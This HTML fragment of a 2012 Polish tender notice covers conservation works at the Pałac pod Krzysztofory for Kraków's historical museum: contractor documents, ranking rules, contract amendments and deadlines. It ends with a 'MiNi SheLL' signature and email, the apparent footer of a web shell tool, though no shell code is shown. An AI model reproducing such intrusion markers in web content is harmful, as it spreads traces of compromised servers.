<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że wykonawca 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, należy złożyć dowody opłacenia składek ubezpieczeniowych, których termin płatności upłynął lub upłynie przed upływem terminu składania Wniosków o dopuszczenie do udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 8.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Zaproszeni do składania ofert zostaną wykonawcy, którzy zajmą najwyższe osiem miejsc w rankingu sporządzonym przez Zamawiającego. 
O miejscu w rankingu decydować będzie  liczba punktów przyznanych Wykonawcom według następujących zasad:
10 pkt. za każde należycie wykonane zadanie spełniające wymogi dotyczące doświadczenia, tj. za każde zadanie polegające na wykonaniu robót budowlano-konserwatorskich polegających na modernizacji, przebudowie, remoncie, nadbudowie  obiektu kubaturowego wpisanego do rejestru zabytków o wartości robót (dla każdego zadania) minimum 10 000 000 zł brutto (słownie: dziesięć  milionów zł brutto). W przypadku otrzymania takiej samej liczby punktów przez dwóch lub większą liczbę Wykonawców, miejsce w rankingu będzie zależało od sumy wartości punktowanych zadań</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
a)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmian stawki podatku VAT), wówczas za niezmienne uznaje się ceny jednostkowe netto, określone w umowie,
b)	w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania umowy na skutek zaistnienia następujących okoliczności:
-z powodu wystąpienia dodatkowych robót, niemożliwych do przewidzenia przed zawarciem umowy przez Wykonawcę, wykonanie których warunkować będzie poprawność realizacji Przedmiotu umowy,
-z powodu okoliczności siły wyższej, tj. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można była przewidzieć 
z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach (nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, które przy składaniu ofert muszą być normalnie brane pod uwagę, (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof),
-z powodu działań osób trzecich uniemożliwiających wykonanie prac, które 
to działania nie są zawinione przez którąkolwiek ze stron,
-w przypadku zawieszenia lub wstrzymania przez Zamawiającego wykonania robót z przyczyn nie leżących po stronie Wykonawcy, 
-w przypadku konieczności wykonania prac wynikających z zaleceń organów uprawnionych np. Nadzoru budowlanego, PIP, Wojewódzkiego Konserwatora Zabytków itp.,
-w przypadku konieczności zmiany sposobu realizacji Przedmiotu umowy, wynikającej m.in. z  konieczności wykonania dodatkowych badań, ekspertyz, analiz itp.,
-wprowadzania rozwiązań zamiennych do Projektu, zatwierdzonych 
przez Zamawiającego, z  zastrzeżeniem, że rozwiązania zamienne nie wykraczają poza określenie Przedmiotu umowy, zawarte w opisie przedmiotu zamówienia 
i wartość Przedmiotu umowy, 
-w przypadku zmiany terminu realizacji Projektu -Modernizacja obiektu Pałacu pod Krzysztofory - głównej siedziby Muzeum Historycznego Miasta Krakowa w wyniku zmiany harmonogramu rzeczowo - finansowego Projektu, umowy Lider - Partner lub  umowy o dofinansowanie Projektu,
c)	ograniczenia zakresu robót wynikającego z braku środków finansowych Zamawiającego lub innych przyczyn leżących po stronie od Zamawiającego,
d)	wystąpienia konieczności zmiany harmonogramu rzeczowo - finansowego wykonania Przedmiotu umowy, 
e)	wystąpienia konieczności zmiany zakresu rzeczowo-finansowego Umowy w sytuacji zmiany technologii  prowadzenia prac, wynikającej ze stanu zachowania obiektu, ujawnionego w trakcie realizacji Umowy, który odbiega od stanu założonego 
w opisie  przedmiotu zamówienia (do wartości zastrzeżonej w umowie, odpowiadającej maksymalnej wartości wynagrodzenia Wykonawcy za realizację Przedmiotu umowy), 
f)	w sytuacji zmian sposobu wykonania Przedmiotu umowy na skutek wystąpienia następujących okoliczności:
-z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego, z  zastrzeżeniem, że zmiana sposobu wykonania zamówienia nie może wykraczać poza określenie Przedmiotu umowy, zawarte w opisie przedmiotu zamówienia i wartość Przedmiotu umowy,
-z powodu zaniechania lub uzasadnionej rezygnacji z wykonania danego zakresu prac, objętego przedmiotem zamówienia,
-z powodu wystąpienia prac zamiennych, o których mowa w art. 20 ust. 1 pkt 3 i pkt 4b) ustawy Prawo budowlane, z  zastrzeżeniem, że prace zamienne 
nie wykraczają poza określenie Przedmiotu umowy, zawarte w opisie przedmiotu zamówienia i wartość Przedmiotu umowy, 
-w przypadku wystąpienia konieczności zmiany zakresu rzeczowo-finansowego Przedmiotu umowy lub asortymentu robót, wynikającej ze stanu zachowania substancji zabytkowej, ujawnionego w trakcie realizacji umowy, który odbiega od stanu założonego w opisie przedmiotu zamówienia, z  zastrzeżeniem, że zmiana sposobu wykonania zamówienia nie może wykraczać poza określenie Przedmiotu umowy, zawarte w opisie przedmiotu zamówienia i wartość Przedmiotu umowy,
-w przypadku zmiany przepisów prawnych powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia.

Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie w formie aneksu pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Na stronie www.mhk.pl znajdują się Wniosek o dopuszczenie do udzialu w postępowaniu oraz załączniki<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ww. dokumenty można uzyskać pod adresem: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, Kraków, II p, pok.22.
SIWZ zostanie przekazana wykonawcom wraz zaproszeniem do składania ofert.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 14:00, miejsce: Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu Modernizacja obiektu Pałacu pod Krzysztofory  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego 
- Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, Oś Priorytetowa 5.  Krakowski Obszar Metropolitalny, Działanie 5.2- Rozwój funkcji metropolitalnych Krakowskiego Obszaru Metropolitalnego.
Ilekroć w niniejszym ogłoszeniu jest mowa o Wykonawcy, odnosi się to także odpowiednio do Wykonawców występujących wspólnie. 
Wzory niektórych oświadczeń i dokumentów, jakie Wykonawca winien złożyć wraz z Wnioskiem o dopuszczenie 
do udziału w postępowaniu stanowią załączniki do niniejszego ogłoszenia.  
Wszelkie płatności będą dokonywane przelewem.
Rozliczenia pomiędzy Zamawiającym a Wykonawcą prowadzone będą wyłącznie w walucie polskiej (PLN).
Wykonawcy występujący wspólnie (np. konsorcjum) mają obowiązek ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z wnioskiem o dopuszczenie do udziału w postępowaniu, pełnomocnictwo lub notarialnie poświadczony odpis pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com